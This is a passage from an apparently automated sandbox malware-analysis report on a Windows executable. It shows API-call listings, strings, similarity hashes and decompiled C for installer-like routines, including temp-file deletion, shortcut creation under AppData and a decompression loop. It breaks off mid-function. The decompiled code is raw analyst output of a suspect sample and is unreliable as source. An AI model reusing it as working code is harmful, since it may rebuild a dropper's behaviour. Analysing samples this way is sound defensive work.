                                                        0x00405a55
                                                        0x00405a61
                                                        0x00405a66
                                                        0x00405a68
                                                        0x00000000
                                                        0x00405a83
                                                        0x00405a6a
                                                        0x00405a6d
                                                        0x00000000
                                                        0x00000000
                                                        0x00405a72
                                                        0x00000000
                                                        0x00405a79
                                                        0x00405a42
                                                        0x00405a42
                                                        0x00000000
                                                        0x00405a42
                                                        0x0040590f
                                                        0x00405912
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00405912

                                                        APIs
                                                        • DeleteFileA.KERNEL32(?,?,747DFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058E8
                                                        • lstrcatA.KERNEL32(0042B898,\*.*,0042B898,?,?,747DFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405930
                                                        • lstrcatA.KERNEL32(?,0040A014,?,0042B898,?,?,747DFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405951
                                                        • lstrlenA.KERNEL32(?,?,0040A014,?,0042B898,?,?,747DFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405957
                                                        • FindFirstFileA.KERNEL32(0042B898,?,?,?,0040A014,?,0042B898,?,?,747DFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405968
                                                        • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405A15
                                                        • FindClose.KERNEL32(00000000), ref: 00405A26
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004058CC
                                                        • \*.*, xrefs: 0040592A
                                                        • "C:\Users\user\Desktop\dY5HmgsBm6.exe" , xrefs: 004058BF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                        • String ID: "C:\Users\user\Desktop\dY5HmgsBm6.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                        • API String ID: 2035342205-784778613
                                                        • Opcode ID: 4def77bb891c7b3960c154a2ad73ead010234d10b8a13dea3fc18deabcd134ba
                                                        • Instruction ID: 53fbf83e18d3e9f22f7fd61ce8145b7df245fbcc76992db59ab4b54644bc6f5f
                                                        • Opcode Fuzzy Hash: 4def77bb891c7b3960c154a2ad73ead010234d10b8a13dea3fc18deabcd134ba
                                                        • Instruction Fuzzy Hash: 4251C470A00A49AADB21AB618D85BBF7A78DF52314F14427FF841711D2C73C8942DF6A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 74%
                                                        			E0040216B() {
                                                        				signed int _t55;
                                                        				void* _t59;
                                                        				intOrPtr* _t63;
                                                        				intOrPtr _t64;
                                                        				intOrPtr* _t65;
                                                        				intOrPtr* _t67;
                                                        				intOrPtr* _t69;
                                                        				intOrPtr* _t71;
                                                        				intOrPtr* _t73;
                                                        				intOrPtr* _t75;
                                                        				intOrPtr* _t78;
                                                        				intOrPtr* _t80;
                                                        				intOrPtr* _t82;
                                                        				intOrPtr* _t84;
                                                        				int _t87;
                                                        				intOrPtr* _t95;
                                                        				signed int _t105;
                                                        				signed int _t109;
                                                        				void* _t111;
                                                        
                                                        				 *(_t111 - 0x38) = E00402BCE(0xfffffff0);
                                                        				 *(_t111 - 0xc) = E00402BCE(0xffffffdf);
                                                        				 *((intOrPtr*)(_t111 - 0x88)) = E00402BCE(2);
                                                        				 *((intOrPtr*)(_t111 - 0x34)) = E00402BCE(0xffffffcd);
                                                        				 *((intOrPtr*)(_t111 - 0x78)) = E00402BCE(0x45);
                                                        				_t55 =  *(_t111 - 0x18);
                                                        				 *(_t111 - 0x90) = _t55 & 0x00000fff;
                                                        				_t105 = _t55 & 0x00008000;
                                                        				_t109 = _t55 >> 0x0000000c & 0x00000007;
                                                        				 *(_t111 - 0x74) = _t55 >> 0x00000010 & 0x0000ffff;
                                                        				if(E00405AFC( *(_t111 - 0xc)) == 0) {
                                                        					E00402BCE(0x21);
                                                        				}
                                                        				_t59 = _t111 + 8;
                                                        				__imp__CoCreateInstance(0x408524, _t87, 1, 0x408514, _t59);
                                                        				if(_t59 < _t87) {
                                                        					L15:
                                                        					 *((intOrPtr*)(_t111 - 4)) = 1;
                                                        					_push(0xfffffff0);
                                                        				} else {
                                                        					_t63 =  *((intOrPtr*)(_t111 + 8));
                                                        					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408534, _t111 - 0x30);
                                                        					 *((intOrPtr*)(_t111 - 8)) = _t64;
                                                        					if(_t64 >= _t87) {
                                                        						_t67 =  *((intOrPtr*)(_t111 + 8));
                                                        						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
                                                        						if(_t105 == _t87) {
                                                        							_t84 =  *((intOrPtr*)(_t111 + 8));
                                                        							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\engineer\\AppData\\Roaming\\CachemanControlPanel");
                                                        						}
                                                        						if(_t109 != _t87) {
                                                        							_t82 =  *((intOrPtr*)(_t111 + 8));
                                                        							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
                                                        						}
                                                        						_t69 =  *((intOrPtr*)(_t111 + 8));
                                                        						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x74));
                                                        						_t95 =  *((intOrPtr*)(_t111 - 0x34));
                                                        						if( *_t95 != _t87) {
                                                        							_t80 =  *((intOrPtr*)(_t111 + 8));
                                                        							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x90));
                                                        						}
                                                        						_t71 =  *((intOrPtr*)(_t111 + 8));
                                                        						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x88)));
                                                        						_t73 =  *((intOrPtr*)(_t111 + 8));
                                                        						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x78)));
                                                        						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
                                                        							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
                                                        							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x38), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
                                                        								_t78 =  *((intOrPtr*)(_t111 - 0x30));
                                                        								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
                                                        							}
                                                        						}
                                                        						_t75 =  *((intOrPtr*)(_t111 - 0x30));
                                                        						 *((intOrPtr*)( *_t75 + 8))(_t75);
                                                        					}
                                                        					_t65 =  *((intOrPtr*)(_t111 + 8));
                                                        					 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                        					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
                                                        						_push(0xfffffff4);
                                                        					} else {
                                                        						goto L15;
                                                        					}
                                                        				}
                                                        				E00401423();
                                                        				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t111 - 4));
                                                        				return 0;
                                                        			}






















                                                        0x00402174
                                                        0x0040217e
                                                        0x00402188
                                                        0x00402195
                                                        0x004021a0
                                                        0x004021a3
                                                        0x004021bd
                                                        0x004021c3
                                                        0x004021c9
                                                        0x004021cc
                                                        0x004021d6
                                                        0x004021da
                                                        0x004021da
                                                        0x004021df
                                                        0x004021f0
                                                        0x004021f8
                                                        0x004022d4
                                                        0x004022d4
                                                        0x004022db
                                                        0x004021fe
                                                        0x004021fe
                                                        0x0040220d
                                                        0x00402211
                                                        0x00402214
                                                        0x0040221a
                                                        0x00402228
                                                        0x0040222b
                                                        0x0040222d
                                                        0x00402238
                                                        0x00402238
                                                        0x0040223d
                                                        0x0040223f
                                                        0x00402246
                                                        0x00402246
                                                        0x00402249
                                                        0x00402252
                                                        0x00402255
                                                        0x0040225a
                                                        0x0040225c
                                                        0x00402269
                                                        0x00402269
                                                        0x0040226c
                                                        0x00402278
                                                        0x0040227b
                                                        0x00402284
                                                        0x0040228a
                                                        0x00402291
                                                        0x004022aa
                                                        0x004022ac
                                                        0x004022ba
                                                        0x004022ba
                                                        0x004022aa
                                                        0x004022bd
                                                        0x004022c3
                                                        0x004022c3
                                                        0x004022c6
                                                        0x004022cc
                                                        0x004022d2
                                                        0x004022e7
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x004022d2
                                                        0x004022dd
                                                        0x00402a5d
                                                        0x00402a69

                                                        APIs
                                                        • CoCreateInstance.OLE32(00408524,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
                                                        • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2
                                                        Strings
                                                        • C:\Users\user\AppData\Roaming\CachemanControlPanel, xrefs: 00402230
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: ByteCharCreateInstanceMultiWide
                                                        • String ID: C:\Users\user\AppData\Roaming\CachemanControlPanel
                                                        • API String ID: 123533781-2369850399
                                                        • Opcode ID: 163f96e7a228f668ad01f6fff9a08a3bf5921adb224fce9e1f45b383d9424720
                                                        • Instruction ID: cfd0f9f97044ed47efa98841b374527745dcc5d1cf4597a5ef188e8ddd78f045
                                                        • Opcode Fuzzy Hash: 163f96e7a228f668ad01f6fff9a08a3bf5921adb224fce9e1f45b383d9424720
                                                        • Instruction Fuzzy Hash: DF510671A00208AFCB50DFE4C989E9D7BB6FF48314F2041AAF515EB2D1DA799981CB54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E0040646B(CHAR* _a4) {
                                                        				void* _t2;
                                                        
                                                        				_t2 = FindFirstFileA(_a4, 0x42c0e0);
                                                        				if(_t2 == 0xffffffff) {
                                                        					return 0;
                                                        				}
                                                        				FindClose(_t2);
                                                        				return 0x42c0e0;
                                                        			}




                                                        0x00406476
                                                        0x0040647f
                                                        0x00000000
                                                        0x0040648c
                                                        0x00406482
                                                        0x00000000

                                                        APIs
                                                        • FindFirstFileA.KERNEL32(747DFA90,0042C0E0,0042BC98,00405BC0,0042BC98,0042BC98,00000000,0042BC98,0042BC98,747DFA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,747DFA90,C:\Users\user\AppData\Local\Temp\), ref: 00406476
                                                        • FindClose.KERNEL32(00000000), ref: 00406482
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: Find$CloseFileFirst
                                                        • String ID:
                                                        • API String ID: 2295610775-0
                                                        • Opcode ID: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                        • Instruction ID: 43645372537bfa69987f3f85d1e9d0a1072f39b89fcefe97c81bac3be47e5bfd
                                                        • Opcode Fuzzy Hash: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                        • Instruction Fuzzy Hash: 9AD01231514120DFC3502B786D4C84F7A589F05330321CB36F86AF22E0C7348C2296EC
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 39%
                                                        			E004027A1(char __ebx, char* __edi, char* __esi) {
                                                        				void* _t19;
                                                        
                                                        				if(FindFirstFileA(E00402BCE(2), _t19 - 0x1d0) != 0xffffffff) {
                                                        					E00406055(__edi, _t6);
                                                        					_push(_t19 - 0x1a4);
                                                        					_push(__esi);
                                                        					E004060F7();
                                                        				} else {
                                                        					 *__edi = __ebx;
                                                        					 *__esi = __ebx;
                                                        					 *((intOrPtr*)(_t19 - 4)) = 1;
                                                        				}
                                                        				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t19 - 4));
                                                        				return 0;
                                                        			}




                                                        0x004027b9
                                                        0x004027cd
                                                        0x004027d8
                                                        0x004027d9
                                                        0x00402918
                                                        0x004027bb
                                                        0x004027bb
                                                        0x004027bd
                                                        0x004027bf
                                                        0x004027bf
                                                        0x00402a5d
                                                        0x00402a69

                                                        APIs
                                                        • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027B0
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: FileFindFirst
                                                        • String ID:
                                                        • API String ID: 1974802433-0
                                                        • Opcode ID: fe0c6c70d9fc1c67409d165531832ab6862d9141dea2be007ff0faa3f611277f
                                                        • Instruction ID: cbd12963852304709d998dbd60bf7e8f33587a64a337c4fd13578998f516bfb3
                                                        • Opcode Fuzzy Hash: fe0c6c70d9fc1c67409d165531832ab6862d9141dea2be007ff0faa3f611277f
                                                        • Instruction Fuzzy Hash: 3EF0A072604110DED711EBA49A49AFEB768AF61314F60457FF112B20C1D7B889469B3A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 79%
                                                        			E00406945(signed int __ebx, signed int* __esi) {
                                                        				signed int _t367;
                                                        				signed int _t396;
                                                        				signed int _t413;
                                                        				signed int _t414;
                                                        				signed int* _t417;
                                                        				void* _t419;
                                                        
                                                        				L0:
                                                        				while(1) {
                                                        					L0:
                                                        					_t417 = __esi;
                                                        					_t396 = __ebx;
                                                        					if( *(_t419 - 0x34) == 0) {
                                                        						break;
                                                        					}
                                                        					L55:
                                                        					__eax =  *(__ebp - 0x38);
                                                        					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                        					__ecx = __ebx;
                                                        					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                        					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                        					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                        					__ebx = __ebx + 8;
                                                        					while(1) {
                                                        						L56:
                                                        						if(__ebx < 0xe) {
                                                        							goto L0;
                                                        						}
                                                        						L57:
                                                        						__eax =  *(__ebp - 0x40);
                                                        						__eax =  *(__ebp - 0x40) & 0x00003fff;
                                                        						__ecx = __eax;
                                                        						__esi[1] = __eax;
                                                        						__ecx = __eax & 0x0000001f;
                                                        						if(__cl > 0x1d) {
                                                        							L9:
                                                        							_t414 = _t413 | 0xffffffff;
                                                        							 *_t417 = 0x11;
                                                        							L10:
                                                        							_t417[0x147] =  *(_t419 - 0x40);
                                                        							_t417[0x146] = _t396;
                                                        							( *(_t419 + 8))[1] =  *(_t419 - 0x34);
                                                        							L11:
                                                        							 *( *(_t419 + 8)) =  *(_t419 - 0x38);
                                                        							_t417[0x26ea] =  *(_t419 - 0x30);
                                                        							E004070B4( *(_t419 + 8));
                                                        							return _t414;
                                                        						}
                                                        						L58:
                                                        						__eax = __eax & 0x000003e0;
                                                        						if(__eax > 0x3a0) {
                                                        							goto L9;
                                                        						}
                                                        						L59:
                                                        						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
                                                        						__ebx = __ebx - 0xe;
                                                        						_t94 =  &(__esi[2]);
                                                        						 *_t94 = __esi[2] & 0x00000000;
                                                        						 *__esi = 0xc;
                                                        						while(1) {
                                                        							L60:
                                                        							__esi[1] = __esi[1] >> 0xa;
                                                        							__eax = (__esi[1] >> 0xa) + 4;
                                                        							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                        								goto L68;
                                                        							}
                                                        							L61:
                                                        							while(1) {
                                                        								L64:
                                                        								if(__ebx >= 3) {
                                                        									break;
                                                        								}
                                                        								L62:
                                                        								if( *(__ebp - 0x34) == 0) {
                                                        									goto L159;
                                                        								}
                                                        								L63:
                                                        								__eax =  *(__ebp - 0x38);
                                                        								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                        								__ecx = __ebx;
                                                        								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                        								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                        								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                        								__ebx = __ebx + 8;
                                                        							}
                                                        							L65:
                                                        							__ecx = __esi[2];
                                                        							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
                                                        							__ebx = __ebx - 3;
                                                        							_t108 = __ecx + 0x408408; // 0x121110
                                                        							__ecx =  *_t108;
                                                        							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
                                                        							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
                                                        							__ecx = __esi[1];
                                                        							__esi[2] = __esi[2] + 1;
                                                        							__eax = __esi[2];
                                                        							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
                                                        							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
                                                        								goto L64;
                                                        							}
                                                        							L66:
                                                        							while(1) {
                                                        								L68:
                                                        								if(__esi[2] >= 0x13) {
                                                        									break;
                                                        								}
                                                        								L67:
                                                        								_t119 = __esi[2] + 0x408408; // 0x4000300
                                                        								__eax =  *_t119;
                                                        								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
                                                        								_t126 =  &(__esi[2]);
                                                        								 *_t126 = __esi[2] + 1;
                                                        							}
                                                        							L69:
                                                        							__ecx = __ebp - 8;
                                                        							__edi =  &(__esi[0x143]);
                                                        							 &(__esi[0x148]) =  &(__esi[0x144]);
                                                        							__eax = 0;
                                                        							 *(__ebp - 8) = 0;
                                                        							__eax =  &(__esi[3]);
                                                        							 *__edi = 7;
                                                        							__eax = E0040711C( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
                                                        							if(__eax != 0) {
                                                        								L72:
                                                        								 *__esi = 0x11;
                                                        								while(1) {
                                                        									L157:
                                                        									_t367 =  *_t417;
                                                        									if(_t367 > 0xf) {
                                                        										break;
                                                        									}
                                                        									L1:
                                                        									switch( *((intOrPtr*)(_t367 * 4 +  &M00407074))) {
                                                        										case 0:
                                                        											L101:
                                                        											__eax = __esi[4] & 0x000000ff;
                                                        											__esi[3] = __esi[4] & 0x000000ff;
                                                        											__eax = __esi[5];
                                                        											__esi[2] = __esi[5];
                                                        											 *__esi = 1;
                                                        											goto L102;
                                                        										case 1:
                                                        											L102:
                                                        											__eax = __esi[3];
                                                        											while(1) {
                                                        												L105:
                                                        												__eflags = __ebx - __eax;
                                                        												if(__ebx >= __eax) {
                                                        													break;
                                                        												}
                                                        												L103:
                                                        												__eflags =  *(__ebp - 0x34);
                                                        												if( *(__ebp - 0x34) == 0) {
                                                        													goto L159;
                                                        												}
                                                        												L104:
                                                        												__ecx =  *(__ebp - 0x38);
                                                        												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                        												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                        												__ecx = __ebx;
                                                        												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                        												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                        												__ebx = __ebx + 8;
                                                        												__eflags = __ebx;
                                                        											}
                                                        											L106:
                                                        											__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
                                                        											__eax = __eax &  *(__ebp - 0x40);
                                                        											__ecx = __esi[2];
                                                        											__eax = __esi[2] + __eax * 4;
                                                        											__ecx =  *(__eax + 1) & 0x000000ff;
                                                        											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                        											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                        											__ecx =  *__eax & 0x000000ff;
                                                        											__eflags = __ecx;
                                                        											if(__ecx != 0) {
                                                        												L108:
                                                        												__eflags = __cl & 0x00000010;
                                                        												if((__cl & 0x00000010) == 0) {
                                                        													L110:
                                                        													__eflags = __cl & 0x00000040;
                                                        													if((__cl & 0x00000040) == 0) {
                                                        														goto L125;
                                                        													}
                                                        													L111:
                                                        													__eflags = __cl & 0x00000020;
                                                        													if((__cl & 0x00000020) == 0) {
                                                        														goto L9;
                                                        													}
                                                        													L112:
                                                        													 *__esi = 7;
                                                        													goto L157;
                                                        												}
                                                        												L109:
                                                        												__esi[2] = __ecx;
                                                        												__esi[1] = __eax;
                                                        												 *__esi = 2;
                                                        												goto L157;
                                                        											}
                                                        											L107:
                                                        											__esi[2] = __eax;
                                                        											 *__esi = 6;
                                                        											goto L157;
                                                        										case 2:
                                                        											L113:
                                                        											__eax = __esi[2];
                                                        											while(1) {
                                                        												L116:
                                                        												__eflags = __ebx - __eax;
                                                        												if(__ebx >= __eax) {
                                                        													break;
                                                        												}
                                                        												L114:
                                                        												__eflags =  *(__ebp - 0x34);
                                                        												if( *(__ebp - 0x34) == 0) {
                                                        													goto L159;
                                                        												}
                                                        												L115:
                                                        												__ecx =  *(__ebp - 0x38);
                                                        												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                        												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                        												__ecx = __ebx;
                                                        												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                        												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                        												__ebx = __ebx + 8;
                                                        												__eflags = __ebx;
                                                        											}
                                                        											L117:
                                                        											 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                        											__esi[1] = __esi[1] + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                        											__ecx = __eax;
                                                        											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                        											__ebx = __ebx - __eax;
                                                        											__eflags = __ebx;
                                                        											__eax = __esi[4] & 0x000000ff;
                                                        											__esi[3] = __esi[4] & 0x000000ff;
                                                        											__eax = __esi[6];
                                                        											__esi[2] = __esi[6];
                                                        											 *__esi = 3;
                                                        											goto L118;
                                                        										case 3:
                                                        											L118:
                                                        											__eax = __esi[3];
                                                        											while(1) {
                                                        												L121:
                                                        												__eflags = __ebx - __eax;
                                                        												if(__ebx >= __eax) {
                                                        													break;
                                                        												}
                                                        												L119:
                                                        												__eflags =  *(__ebp - 0x34);
                                                        												if( *(__ebp - 0x34) == 0) {
                                                        													goto L159;
                                                        												}
                                                        												L120:
                                                        												__ecx =  *(__ebp - 0x38);
                                                        												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                        												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                        												__ecx = __ebx;
                                                        												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                        												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                        												__ebx = __ebx + 8;
                                                        												__eflags = __ebx;
                                                        											}
                                                        											L122:
                                                        											__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
                                                        											__eax = __eax &  *(__ebp - 0x40);
                                                        											__ecx = __esi[2];
                                                        											__eax = __esi[2] + __eax * 4;
                                                        											__ecx =  *(__eax + 1) & 0x000000ff;
                                                        											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                        											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                        											__ecx =  *__eax & 0x000000ff;
                                                        											__eflags = __cl & 0x00000010;
                                                        											if((__cl & 0x00000010) == 0) {
                                                        												L124:
                                                        												__eflags = __cl & 0x00000040;
                                                        												if((__cl & 0x00000040) != 0) {
                                                        													goto L9;
                                                        												}
                                                        												L125:
                                                        												__esi[3] = __ecx;
                                                        												__ecx =  *(__eax + 2) & 0x0000ffff;
                                                        												__esi[2] = __eax;
                                                        												goto L157;
                                                        											}
                                                        											L123:
                                                        											__esi[2] = __ecx;
                                                        											__esi[3] = __eax;
                                                        											 *__esi = 4;
                                                        											goto L157;
                                                        										case 4:
                                                        											L126:
                                                        											__eax = __esi[2];
                                                        											while(1) {
                                                        												L129:
                                                        												__eflags = __ebx - __eax;
                                                        												if(__ebx >= __eax) {
                                                        													break;
                                                        												}
                                                        												L127:
                                                        												__eflags =  *(__ebp - 0x34);
                                                        												if( *(__ebp - 0x34) == 0) {
                                                        													goto L159;
                                                        												}
                                                        												L128:
                                                        												__ecx =  *(__ebp - 0x38);
                                                        												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                        												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                        												__ecx = __ebx;
                                                        												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                        												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                        												__ebx = __ebx + 8;
                                                        												__eflags = __ebx;
                                                        											}
                                                        											L130:
                                                        											 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                        											__esi[3] = __esi[3] + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                        											__ecx = __eax;
                                                        											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                        											__eflags = __ebx;
                                                        											 *__esi = 5;
                                                        											goto L131;
                                                        										case 5:
                                                        											L131:
                                                        											__eax =  *(__ebp - 0x30);
                                                        											__edx = __esi[3];
                                                        											_push(__esi);
                                                        											__al = __al | 0x0000008b;
                                                        											asm("enter 0xce2b, 0x81");
                                                        											goto 0x4089dd;
                                                        										case 6:
                                                        											L133:
                                                        											__eax =  *(__ebp - 0x2c);
                                                        											__edi =  *(__ebp - 0x30);
                                                        											__eflags = __eax;
                                                        											if(__eax != 0) {
                                                        												L149:
                                                        												__cl = __esi[2];
                                                        												 *__edi = __cl;
                                                        												__edi = __edi + 1;
                                                        												__eax = __eax - 1;
                                                        												 *(__ebp - 0x30) = __edi;
                                                        												 *(__ebp - 0x2c) = __eax;
                                                        												goto L23;
                                                        											}
                                                        											L134:
                                                        											__ecx = __esi[0x26e8];
                                                        											__eflags = __edi - __ecx;
                                                        											if(__edi != __ecx) {
                                                        												L140:
                                                        												__esi[0x26ea] = __edi;
                                                        												__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
                                                        												__edi = __esi[0x26ea];
